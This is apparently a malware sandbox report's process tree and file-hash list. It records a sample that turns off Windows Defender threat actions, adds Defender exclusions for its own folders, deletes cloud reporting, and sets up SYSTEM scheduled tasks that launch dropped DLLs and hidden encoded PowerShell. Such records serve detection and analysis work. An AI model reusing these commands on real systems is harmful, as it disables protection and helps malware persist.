/reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3776 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:3832 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2088
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:2380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2132
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:5076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:2780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:2700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:3720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:3300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:1356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:3744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4600
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:2692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:2108
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VPYaDjxZBwAU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VPYaDjxZBwAU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VuDzvJgGU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VuDzvJgGU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZGnoZfjlmqUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZGnoZfjlmqUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qmPxrUzoObJDycnPoNR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qmPxrUzoObJDycnPoNR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sZZRdZcplUZcC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sZZRdZcplUZcC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\TKAtlPiSKHaugkVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\TKAtlPiSKHaugkVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ktMefzCUrrOVNfEHK\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ktMefzCUrrOVNfEHK\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EaSLpcFpMcYPpQna\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EaSLpcFpMcYPpQna\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2332 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VPYaDjxZBwAU2" /t REG_DWORD /d 0 /reg:323⤵PID:3348
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VPYaDjxZBwAU2" /t REG_DWORD /d 0 /reg:324⤵PID:1460
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VPYaDjxZBwAU2" /t REG_DWORD /d 0 /reg:643⤵PID:4368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VuDzvJgGU" /t REG_DWORD /d 0 /reg:323⤵PID:2432
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VuDzvJgGU" /t REG_DWORD /d 0 /reg:643⤵PID:1948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZGnoZfjlmqUn" /t REG_DWORD /d 0 /reg:323⤵PID:4084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZGnoZfjlmqUn" /t REG_DWORD /d 0 /reg:643⤵PID:440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qmPxrUzoObJDycnPoNR" /t REG_DWORD /d 0 /reg:323⤵PID:732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qmPxrUzoObJDycnPoNR" /t REG_DWORD /d 0 /reg:643⤵PID:4136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sZZRdZcplUZcC" /t REG_DWORD /d 0 /reg:323⤵PID:3120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sZZRdZcplUZcC" /t REG_DWORD /d 0 /reg:643⤵PID:1360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\TKAtlPiSKHaugkVB /t REG_DWORD /d 0 /reg:323⤵PID:4324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\TKAtlPiSKHaugkVB /t REG_DWORD /d 0 /reg:643⤵PID:3780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ktMefzCUrrOVNfEHK /t REG_DWORD /d 0 /reg:323⤵PID:3748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ktMefzCUrrOVNfEHK /t REG_DWORD /d 0 /reg:643⤵PID:1920
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\EaSLpcFpMcYPpQna /t REG_DWORD /d 0 /reg:323⤵PID:368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\EaSLpcFpMcYPpQna /t REG_DWORD /d 0 /reg:643⤵PID:2056
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gRggpLvgj" /SC once /ST 13:22:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:1544
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gRggpLvgj"2⤵PID:3816
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gRggpLvgj"2⤵PID:3832
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MMXfBASmfLrLvsZVI" /SC once /ST 01:53:10 /RU "SYSTEM" /TR "\"C:\Windows\Temp\EaSLpcFpMcYPpQna\cVwamVazuLxyuGF\IqdCyRw.exe\" YN /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3820
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "MMXfBASmfLrLvsZVI"2⤵PID:3792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3012 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3036
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:5116
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1300
-
C:\Windows\Temp\EaSLpcFpMcYPpQna\cVwamVazuLxyuGF\IqdCyRw.exeC:\Windows\Temp\EaSLpcFpMcYPpQna\cVwamVazuLxyuGF\IqdCyRw.exe YN /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3992 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bkuWmsEVxSoFBLrMoP"2⤵PID:4224
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:2736
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:408
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:3408
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:3372
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\VuDzvJgGU\TPwIrb.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "XKFBGwgxrEulmgf" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3136
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XKFBGwgxrEulmgf2" /F /xml "C:\Program Files (x86)\VuDzvJgGU\wHnIpIA.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4280
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "XKFBGwgxrEulmgf"2⤵PID:5108
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "XKFBGwgxrEulmgf"2⤵PID:3144
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ygYtRpdpzHKXae" /F /xml "C:\Program Files (x86)\VPYaDjxZBwAU2\iFrQYyw.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3644
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gSJRdsAOyHiKz2" /F /xml "C:\ProgramData\TKAtlPiSKHaugkVB\QUqVJng.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:756
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RCDCxUhxthlawUVuW2" /F /xml "C:\Program Files (x86)\qmPxrUzoObJDycnPoNR\awShcvn.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:732
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IIYicLxXywbNiIBtYoL2" /F /xml "C:\Program Files (x86)\sZZRdZcplUZcC\LgfqmRM.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4720
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gPnQnOXuswVFDBxMw" /SC once /ST 02:05:01 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\EaSLpcFpMcYPpQna\DjUBPKZx\OHvcXun.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3780
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gPnQnOXuswVFDBxMw"2⤵PID:4572
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:396
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:5056
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:1428
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:2364
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MMXfBASmfLrLvsZVI"2⤵PID:900
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\EaSLpcFpMcYPpQna\DjUBPKZx\OHvcXun.dll",#1 /site_id 5254031⤵PID:1368
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\EaSLpcFpMcYPpQna\DjUBPKZx\OHvcXun.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4624 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gPnQnOXuswVFDBxMw"3⤵PID:4352
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD58b3c140ec536f16c009d9ffb1c6d60f3
SHA1a7c7ba4a60a7d584613d665b5db14bb214f69c24
SHA256819ac9ab35fd749ad6b7127dff47ba3b401d546c94e1e04918705379dfd617d0
SHA51238339af860ff8bd8d8e7937e0b8d05115311891162adc43bbfb3d7679acc5eeee0df243835e2e1a6ca62e323bedc43e5fe9e0151530c85d069cc7c508b419c82
-
Filesize
2KB
MD524e3fb1cd6740e18dbccc039e8162495
SHA1404f99a2d58444b774e386bc09d544f2b207c6b7
SHA256f9ad83d51232650459abd73800e4d513caa49c862fc6d8ccc92420652a52afc3
SHA512f55f98af509a990606296932538f0ef40e332e59114e6ae76b6cb61021b725750c5455306cc35bc69695f908045e9d887f2e6cc64f52e269a171412c3fd83303
-
Filesize
2KB
MD502dc232a172aa351f1cbcc9f3246a2fa
SHA118a1bb4120f6449b9160d0641eeae71bd4b4ea6a
SHA2564bd86da243956fad69e6e6e0134c1b25a5122606a793e3b3617d6f24ec2e76a6
SHA51258987c18fbb508357415432d53678ce7df99b41266d68448b114e1a9fe96ad218e455920da2a14409a2509534647658ab88e9c128202c1ab6606bca91328702a
-
Filesize
2KB
MD565121b111eaa2346f85ba7b288bbe83f
SHA169e78bd4dd9ecb8731f87ebf2a16213e52785c2d
SHA2569a4ce7a4086bd2521bba804e198e804e1341de945900adfa930333ddc4a0a18d
SHA512abaa71c0160916d1447883c45b24a713bf21f507eeba4ee9b66406430c5952ad0d1c4846f85aecdbc6b4100eb38c2535a49e9b951ae34bd0d7c4d16151789eec
-
Filesize
2KB
MD58ffa7ef0cdc6922d476f771031d45018
SHA12283b6d2e337cb6b5a965161a867864eb7db6b47
SHA256c0eafa67490dd6672deaaea7bb6627834bd51d220fb0091bf5f3d7f13d743892
SHA51240da9bed4ccea60ca38eed573b423068d23eeede9996c15fcbc6144c8f41e4b57a2efed9bef7bc5e46a6f201094ae4d9d0c1efa16d6a74b02efccaebfcf2cc3f
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD5a6c9d692ed2826ecb12c09356e69cc09
SHA1def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA5122f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3
-
Filesize
6.3MB
MD54d6280b3dd511a181bad360a142ec41e
SHA1c419737eac8d6b8d862d7f807090adc6a31eb8b1
SHA256d451c9fc2553b94debb80d2a15d675a66c37aa7b3b1be4ff4aac317b9d26a9cb
SHA512e48c300e9dcb8010ffb17103204c29fef76fcb4b4ff257bafebf4a9f56e47b8eb6c71b15f9b3f6b97c25a8e20831d95a7e2261ab4344d8807ae39c87c3b00a02
-
Filesize
6.3MB
MD54d6280b3dd511a181bad360a142ec41e
SHA1c419737eac8d6b8d862d7f807090adc6a31eb8b1
SHA256d451c9fc2553b94debb80d2a15d675a66c37aa7b3b1be4ff4aac317b9d26a9cb
SHA512e48c300e9dcb8010ffb17103204c29fef76fcb4b4ff257bafebf4a9f56e47b8eb6c71b15f9b3f6b97c25a8e20831d95a7e2261ab4344d8807ae39c87c3b00a02
-
Filesize
6.8MB
MD51442a2d278cea34e0c7e095683835c4b
SHA1fed96b291038fa4009938a57f8d92108ca2bb65f
SHA256d426cd3f3798a1a62b254dea16846db5f1f035d4a20ea38e4dc0aa3a8ce09ba1
SHA51270ed462d1f5b5d23ccaff9c2512c5ca7f35ff818f34089c02b1a01048b4f5245da76bc7b09baee0ffd3f6ea8d398f85f0531a8161f5e4f347c914f01ea0c340a
-
Filesize
6.8MB
MD51442a2d278cea34e0c7e095683835c4b
SHA1fed96b291038fa4009938a57f8d92108ca2bb65f
SHA256d426cd3f3798a1a62b254dea16846db5f1f035d4a20ea38e4dc0aa3a8ce09ba1
SHA51270ed462d1f5b5d23ccaff9c2512c5ca7f35ff818f34089c02b1a01048b4f5245da76bc7b09baee0ffd3f6ea8d398f85f0531a8161f5e4f347c914f01ea0c340a
-
Filesize
6.8MB
MD51442a2d278cea34e0c7e095683835c4b
SHA1fed96b291038fa4009938a57f8d92108ca2bb65f
SHA256d426cd3f3798a1a62b254dea16846db5f1f035d4a20ea38e4dc0aa3a8ce09ba1
